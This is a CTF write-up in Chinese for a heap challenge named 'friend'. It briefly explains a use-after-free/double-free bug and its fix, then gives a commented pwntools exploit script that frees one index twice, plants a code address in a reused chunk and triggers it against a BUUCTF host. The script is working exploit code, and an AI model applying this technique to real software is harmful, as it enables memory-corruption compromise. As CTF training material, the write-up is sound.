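漏洞点:UAF(use-after-free,释放后使用)。从下面的脚本看,同一索引可以被释放两次,释放后仍能对其调用 show,说明程序在 free 之后应当没有将指针置空;修复方式是释放后立即置空,并在使用前检查。
利用脚本(exp):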
from pwn import *
# Target selection: the script talks to the hosted challenge instance.
# The commented-out line below is the author's local alternative; swap the
# two to run against a local copy of the binary instead.
p = remote('node4.buuoj.cn', 25968)
# p=process('./friend')

# Load the challenge binary's metadata. `elf` is not referenced again in the
# visible script.
elf = ELF('./friend')
def add(size, name):
    """Drive menu option 1: create an entry with a name of the given size.

    Answers three prompts in order on the global tube `p`: the menu choice,
    the name size (sent as decimal text) and the name itself.

    Args:
        size: Requested name size; converted with ``str()`` before sending.
        name: Name contents, sent as-is (the script passes both text and
            packed bytes).
    """
    dialogue = (
        ("Your choice :", '1'),
        ("Her name size is :", str(size)),
        ("Her name is :", name),
    )
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)
def delete(index):
    """Drive menu option 2: ask the program to free the entry at `index`.

    Args:
        index: Entry index; converted with ``str()`` before sending.
    """
    dialogue = (
        ("Your choice :", '2'),
        ("Index :", str(index)),
    )
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)
def show(index):
    """Drive menu option 3: ask the program to display the entry at `index`.

    Args:
        index: Entry index; converted with ``str()`` before sending.
    """
    dialogue = (
        ("Your choice :", '3'),
        ("Index :", str(index)),
    )
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)
def dbg():
    """Attach gdb to the tube `p`, then block until the operator continues.

    Debugging aid only; it is not called anywhere in the visible script.
    """
    gdb.attach(p)
    # Hold the script here so the debugger session can be set up first.
    pause()
# Hard-coded addresses chosen by the author for this binary.
# `buf` is never used below; presumably it is the global entry table. TODO confirm
buf = 0x6020A0
# `sh` is the 8-byte value written into the last allocation; presumably the
# address of a routine already present in the binary. TODO confirm
sh = 0x400b9c

# Create two entries with 0x20-byte names: indices 0 and 1.
for _ in range(2):
    add(0x20, 'aaaa')

# Free in the order 0, 1, 0. Index 0 is released twice, and the program
# accepting this is the root cause the page names (UAF): the entry is still
# reachable after being freed. Clearing the pointer on free and rejecting
# freed indices in delete/show would stop the sequence here.
for idx in (0, 1, 0):
    delete(idx)

# Index 2: a 0x10-byte name whose contents are the packed 64-bit value of `sh`.
# Presumably this request is served from memory released above, so the bytes
# land in data still referenced by a freed entry. TODO confirm against the binary
payload = p64(sh)
add(0x10, payload)

# Use the stale entry: show() on index 1, which was freed earlier.
show(1)

# Hand the connection over to the operator.
p.interactive()